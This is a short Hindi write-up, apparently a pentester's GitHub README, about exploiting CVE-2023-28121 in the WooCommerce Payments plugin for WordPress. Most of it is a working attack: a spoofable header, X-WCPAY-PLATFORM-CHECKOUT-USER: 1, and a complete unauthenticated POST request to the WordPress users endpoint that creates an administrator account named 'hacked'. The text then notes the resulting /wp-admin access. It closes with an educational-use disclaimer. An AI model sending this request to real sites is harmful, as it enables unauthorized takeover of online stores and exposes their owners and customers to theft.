
वर्डप्रेस में वूकॉमर्स पेमेंट्स प्लगइन का उपयोग करके एक गंभीर कमजोरी का व्यावहारिक शोषण।
वर्डप्रेस में WooCommerce Payments प्लगइन का उपयोग करके महत्वपूर्ण कमजोरी का व्यावहारिक शोषण।
CVE-2023-28121 REST API के माध्यम से बिना प्रमाणीकरण के व्यवस्थापक उपयोगकर्ता बनाने की अनुमति देता है।
📊 प्रभावित प्लगइन में सैकड़ों हजारों स्थापनाएँ हैं, और इसका व्यापक रूप से ई-कॉमर्स में उपयोग किया जाता है।
https://github.com/user-attachments/assets/cead3884-0924-4320-967f-de9fb3f6cd44
सिस्टम एक हेरफेर करने योग्य हेडर स्वीकार करता है:
X-WCPAY-PLATFORM-CHECKOUT-USER: 1
इसके साथ, बिना वैध प्रमाणीकरण के उच्च विशेषाधिकारों वाला उपयोगकर्ता बनाने के लिए एक अनुरोध भेजना संभव है।
POST /wp-json/wp/v2/users
Content-Type: application/json
X-WCPAY-PLATFORM-CHECKOUT-USER: 1
{
"username": "hacked",
"password": "StrongPass123!",
"email": "[email protected]",
"roles": ["administrator"]
}
✔️ परिणाम: व्यवस्थापक उपयोगकर्ता का निर्माण
/wp-admin तक पहुँच👨💻 लेखक
Luis Eduardo .M.B.S.R
पेंटेस्टर / वेब सुरक्षा
LinkedIn: https://www.linkedin.com/in/luis-eduardo-ti/
GitHub: https://github.com/luisdevpentest
नियंत्रित वातावरण में शैक्षिक उपयोग। तीसरे पक्ष द्वारा ऐसे ज्ञान के उपयोग के लिए मैं जिम्मेदार नहीं हूँ।